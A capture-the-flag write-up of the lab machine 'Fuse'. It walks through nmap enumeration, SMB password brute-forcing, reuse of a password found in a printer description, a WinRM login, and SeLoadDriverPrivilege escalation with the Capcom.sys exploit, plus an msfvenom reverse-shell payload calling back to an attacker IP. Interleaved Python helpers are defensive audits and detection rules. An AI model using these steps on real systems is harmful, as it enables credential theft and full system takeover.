
Author Ikonw

nmap

# Nmap 7.80 scan initiated Wed Sep  2 03:57:19 2020 as: nmap -Pn -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49675,49676,49680,49698 -oN nmap/Full_10.10.10.193.nmap 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.0079s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-02 08:10:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/2%Time=5F4F506B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m00s, deviation: 4h02m32s, median: 12m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-09-02T01:12:45-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-02T08:12:42
|_ start_date: 2020-09-02T08:04:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 2 04:01:52 2020 -- 1 IP address (1 host up) scanned in 273.40 seconds

We get the FQDN (Fuse.fabricorp.local) from the smb-os-discovery script output and add it to /etc/hosts.
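As an added helper (my own code, not the author's), a Python parser that pulls the IP, FQDN and domain out of an nmap -oN report like the one above and emits the matching /etc/hosts line. The sample input is the relevant lines of the scan above, embedded so it runs offline; the parser also handles several hosts in one report, which the scan above does not show.

```python
import re

# Constructed sample: the lines of the nmap report above that carry the host
# name information (scan header, LDAP banner, smb-os-discovery block).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.193
Host is up (0.0079s latency).
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| Domain name: fabricorp.local
| FQDN: Fuse.fabricorp.local
"""


def _entry(ip, fqdn, domain):
    """Build one hosts line: FQDN, short name, then the domain itself."""
    names = []
    if fqdn:
        names += [fqdn.lower(), fqdn.split(".")[0].lower()]
    if domain and domain.lower() not in names:
        names.append(domain.lower())
    return f"{ip} {' '.join(names)}" if names else None


def hosts_entries(nmap_text):
    """Return one /etc/hosts line per scanned host that reported an FQDN
    (smb-os-discovery) or at least a domain (LDAP banner / smb-os-discovery)."""
    entries = []
    ip = fqdn = domain = None
    for line in nmap_text.splitlines():
        # "Nmap scan report for 10.0.0.1" or "... for name (10.0.0.1)"
        m = re.match(r"Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?", line)
        if m:
            if ip:
                entries.append(_entry(ip, fqdn, domain))
            ip, fqdn, domain = m.group(1), None, None
            continue
        m = re.search(r"\|\s*FQDN:\s*(\S+)", line)
        if m:
            fqdn = m.group(1)
        m = re.search(r"Domain(?: name)?:\s*([\w.-]+)", line)
        if m and not domain:
            domain = m.group(1)
    if ip:
        entries.append(_entry(ip, fqdn, domain))
    return [e for e in entries if e]
```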

I like to enumerate the SMB ports first.

┌──(root💀kali)-[~]
└─# enum4linux Fuse.fabricorp.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 7 11:02:19 2020

However, it did not give me any critical information, and anonymous login did not get me anything either.

┌──(root💀kali)-[~]
└─# smbclient -L 10.10.10.193
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

Moving on to the web server: it looks like a PaperCut CMS, if I'm not wrong.

I found some usernames in the print logs.


We collect all the usernames:

pmerton
tlavel
sthompson
bhult
administrator

Judging by previous boxes such as Sauna, the entry point is most likely to collect usernames and passwords from the web server and brute-force them against the SMB ports.

Therefore we use cewl to build a password wordlist from the site:

cewl -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm -m3 --with-numbers

Launch msfconsole and use the smb_login module to brute-force:

msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE user
USER_FILE => user
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE wordlist
PASS_FILE => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain fabricorp.local
smbdomain => fabricorp.local
msf5 auxiliary(scanner/smb/smb_login) > run

and successfully get two sets of credentials:

[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'fabricorp.local\tlavel:Fabricorp01'
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'fabricorp.local\bhult:Fabricorp01'

Trying to log in to the SMB server, I was prompted with an error I had never met before. Both accounts have the same problem:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

After some googling, I found out I can use smbpasswd to change the password.


There seems to be a password policy, so I change the password to Fabricop011 for both accounts:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

After some enumeration with rpcclient I found a list of usernames and one password, $fab@s3Rv1ce$1.

The usernames:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and the password, sitting in a printer's description:

rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
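The printer description above is the kind of finding a defender can sweep for: printer comments and AD description fields are readable by every authenticated user. As an added example (my own code, not part of the write-up), a Python scan over a {object: description} mapping that flags descriptions embedding a password and reports them redacted; the sample fields are constructed, with the page's printer description among them.

```python
import re

# Constructed sample: the printer description returned above plus two benign
# description fields, keyed by object name as rpcclient would list them.
SAMPLE_FIELDS = {
    r"\\10.10.10.193\HP-MFT01": r"\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,"
                                "Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)",
    "svc-scan": "Service account for scan-to-folder jobs",
    "bnielson": "Helpdesk, ext 4412",
}

# Phrasings that betray a stored credential in a free-text attribute.
SECRET_RE = re.compile(r"\b(?:password|passwd|pwd|pass|pw)\s*[:=]\s*(\S+)", re.I)


def redact(value):
    """Keep only the first and last character so the finding can go into a
    ticket without republishing the secret."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def find_exposed_credentials(fields):
    """Scan {object_name: description} and return one finding per description
    that appears to embed a password (value redacted, length kept)."""
    findings = []
    for name, text in fields.items():
        m = SECRET_RE.search(text)
        if m:
            # drop trailing punctuation from the enclosing sentence, e.g. ")"
            secret = m.group(1).rstrip(")],;.")
            findings.append({"object": name, "redacted": redact(secret), "length": len(secret)})
    return findings
```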

Next we try to log in to Windows using these credentials.

Going back to msfconsole, we launch the WinRM login module to try this password against every username,

and we get the creds svc-print:$fab@s3Rv1ce$1.

Use evil-winrm to log in:

┌──(root💀kali)-[/opt/evil-winrm]
└─# ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p \$fab@s3Rv1ce\$1 1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


Directory: C:\Users\svc-print


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/1/2020 1:45 AM Desktop
d-r--- 5/31/2020 5:20 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


Directory: C:\Users\svc-print\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/7/2020 12:35 AM 34 user.txt

Root

After getting a shell as svc-print, check the account's privileges:

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeLoadDriverPrivilege is enabled.
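The table above is in the layout `whoami /priv` prints. As an added defender-side example (my own code, not the author's), a Python audit that parses such a table and flags privileges a plain service account should not hold; the risk notes are mine, and each entry opens with the User Rights Assignment policy name under which the privilege is removed.

```python
import re

# Constructed sample: the privilege table from the session above, in the
# layout `whoami /priv` prints it.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges whose holder can reach SYSTEM or arbitrary file access. The
# text before the parenthesis is the User Rights Assignment policy to edit.
HIGH_RISK = {
    "SeLoadDriverPrivilege": "Load and unload device drivers (kernel code via a vulnerable signed driver)",
    "SeImpersonatePrivilege": "Impersonate a client after authentication (token impersonation to SYSTEM)",
    "SeDebugPrivilege": "Debug programs (open and inject into any process)",
    "SeBackupPrivilege": "Back up files and directories (read any file, e.g. SAM/NTDS)",
    "SeRestorePrivilege": "Restore files and directories (write any file)",
    "SeTakeOwnershipPrivilege": "Take ownership of files or other objects",
}


def parse_privileges(text):
    """Map privilege name -> state for every row of the table. A 'Disabled'
    row still matters: the holder can enable it at any time."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def audit_privileges(text):
    """Return (privilege, state, why_it_matters) for each high-risk privilege
    the account holds, whatever its current state."""
    privs = parse_privileges(text)
    return [(name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK]
```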

Abusing SeLoadDriverPrivilege for privilege escalation

This site is a good reference for SeLoadDriverPrivilege escalation:

EopLoaddriver

Capcom.sys

ExploitCapcom

Open up the ExploitCapcom.cpp file and modify the LaunchShell function: change the commandLine[] target to meterpreter.exe and compile it.


Next we have to generate meterpreter.exe:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=1234 -f exe > meterpreter.exe

Create a folder called temp in C:\ and upload all four files (EOPLOADDRIVER.exe, capcom.sys, ExploitCapcom.exe and meterpreter.exe) to the target server.

*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002841CC20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
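The session above leaves two clear traces: a driver service key written under the user's own registry hive (the \Registry\User\<SID>\... path EOPLOADDRIVER prints) and a driver loaded from C:\temp. As an added detection example (my own code, not from the write-up or the tools it uses), two rules over constructed Sysmon-style events, Event ID 13 (registry value set) and Event ID 6 (driver loaded), whose field names follow Sysmon's schema; the sample events mirror the paths shown above.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 13 (registry
# value set) and Event ID 6 (driver loaded); values mirror the session above,
# followed by a benign pair for the built-in tcpip.sys driver.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\temp\EOPLOADDRIVER.exe",
     "TargetObject": r"HKU\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService\ImagePath",
     "Details": r"\??\C:\temp\capcom.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\temp\capcom.sys", "Signed": "true"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\ImagePath",
     "Details": r"\SystemRoot\System32\drivers\tcpip.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
]

# A driver service defined under HKU\<SID> is only useful to NtLoadDriver
# called with SeLoadDriverPrivilege; nothing legitimate writes one there.
USER_HIVE_SERVICE = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\System\\CurrentControlSet\\[^\\]+\\ImagePath$", re.I)
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\", "\\systemroot\\system32\\drivers\\")
KNOWN_VULNERABLE = {"capcom.sys"}  # the driver this write-up loads; extend from a blocklist


def classify(event):
    """Return the alert reasons for one event (empty list when benign)."""
    reasons = []
    if event["EventID"] == 13 and USER_HIVE_SERVICE.match(event["TargetObject"]):
        reasons.append("driver service key written under a user hive (SeLoadDriverPrivilege abuse)")
    if event["EventID"] == 6:
        path = event["ImageLoaded"].lower()
        if not path.startswith(TRUSTED_DRIVER_DIRS):
            reasons.append("driver loaded from outside System32\\drivers")
        if path.rsplit("\\", 1)[-1] in KNOWN_VULNERABLE:
            reasons.append("known vulnerable driver (arbitrary kernel read/write primitive)")
    return reasons


def alerts(events):
    """Flatten to (EventID, reason) pairs for every event that fires a rule."""
    return [(e["EventID"], r) for e in events for r in classify(e)]
```

Preventively, HVCI or a vulnerable-driver blocklist stops the driver load itself, and removing "Load and unload device drivers" from the service account removes the primitive.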

And we get the meterpreter session on our multi/handler.




root